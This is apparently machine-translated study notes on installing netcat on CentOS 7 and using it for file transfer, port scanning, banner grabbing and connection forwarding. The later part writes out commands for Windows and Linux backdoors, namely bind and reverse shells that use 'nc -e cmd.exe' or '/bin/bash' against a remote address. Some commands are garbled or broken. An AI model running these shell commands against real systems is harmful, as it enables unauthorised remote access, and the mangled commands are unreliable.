centos7 download nc:
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
Extracting tar -zxvf netcat-0.7.1.tar.gz
cd /usr/local
mv netcat-0.7.1 netcat
cd /usr/local/netcat
./configure
Compile make
Install make install
Configure vim / etc / profile
Add the following:
*# set netcat path
export NETCAT_HOME=/opt/netcat
export PATH= NETCAT_HOME/bin
Save, exit, and configuration to take effect:
source /etc/profile
test
nc -help success
base64 conversion
in the terminal and input the desired value input base64 converting
base64
dangtianpeng
after press Enter to obtain ctrl + D
Based tcp / ip protocol (c / s Model)
The server to transmit data to the client
Forwarding information:
Creating a server-side method:
nc the -l -p localPort
nc the -l -p 333 (server ip: 1.1.1.1)
创建一个客户端方法(连接服务端)
nc [remote_addr] [remoteport]
nc -nv 1.1.1.1 333
Returns shell of
creating a server method:
nc the -l -p [localPort] -e cmd.exe
创建一个客户端方法(连接服务器端)
nc [remote_addr][remoteport]
Nc data transmission, use of standard input and output streams, you can directly use the command line operation.
Use file transfer method:
to create a server-side method: (a server receives a file)
NC -l -p [localPort]> outfile.txt
NC 333 -l -p> outfile.txt
create a client (file transfer)
NC [REMOTE_ADDR ] [remoteport] </root/Desktop/flag.txt
If at this time the server was not ready to connect, and the client has to use nc to connect,
then the client will wait forever, knowing that connect the server, resulting in a kind of "suspended animation" state
solution: set the wait time
nc -w3 [ip] [port] set the wait time is 3 seconds, 3 seconds later, the client close the connection
netcat information detection
- Target network scanning
- Simple detection of a target port
- The service banner goals crawl
Port scan using
NC -v -n the -Z -W1 [target_ip] [start_target_port-stop_target_port]
-v detailed representation of the error output
-n not target machine DNS resolution
-z zero I / O mode, dedicated to the port scan, represents IP data sent by the target table does not contain any payload,
speed can be accelerated so doing scan
-w1 timeout of 1 second
banner抓取
echo " " | nc -v -n -w1 [target_ip][start_target_port-stop_target_port]
Acquisition target commands execute permissions
window established back door method:
- Monitor type back door
nc -l -p 4444 -e cmd.exe - Backdoor connection type
nc [remote_ip] [remote_port] -e cmd.exe
The method of establishing linux backdoor
1. backdoor monitor type:
NC -l -p 4444 -e / bin / the bash
2. backdoor connection type
nc [remote_ip] [remote_port] -e / bin / bash
Command parameters
View -h parameter command
from the command window, run in the background -d
execute a program, established back door -e
set the gateway, used in the breakthrough limit -G network
routing hops -g
set up each row of data interval -i
set netcat in a listening state waiting for connection -l
set netcat in listening state waiting for a connection, when the client opens, the server still returns to the wait state -L
set netcat only identify ip address, DNS resolution -n no longer
set the transfer hexadecimal -o data
set local listening port number -p
provided netcat -r randomized port number
provided -s netcat source address
reply request packet -t telnet
provided using netcat -u UDP mode (tcp netcat default mode)
displays -v error message
provided connected to the timeout in seconds -w
set the scan mode, data representing the transmitted packet does not contain payload -z
Connection forwarding
is to break the connection limit in certain special circumstances, to deal with some special cases
echo nc [target] [Port]> delay.bat
nc the -l -p [localPort] -e delay.bat
when the client connection to the service when the end, client connections and connection to the target server via the port forwarding function to achieve a connection. ()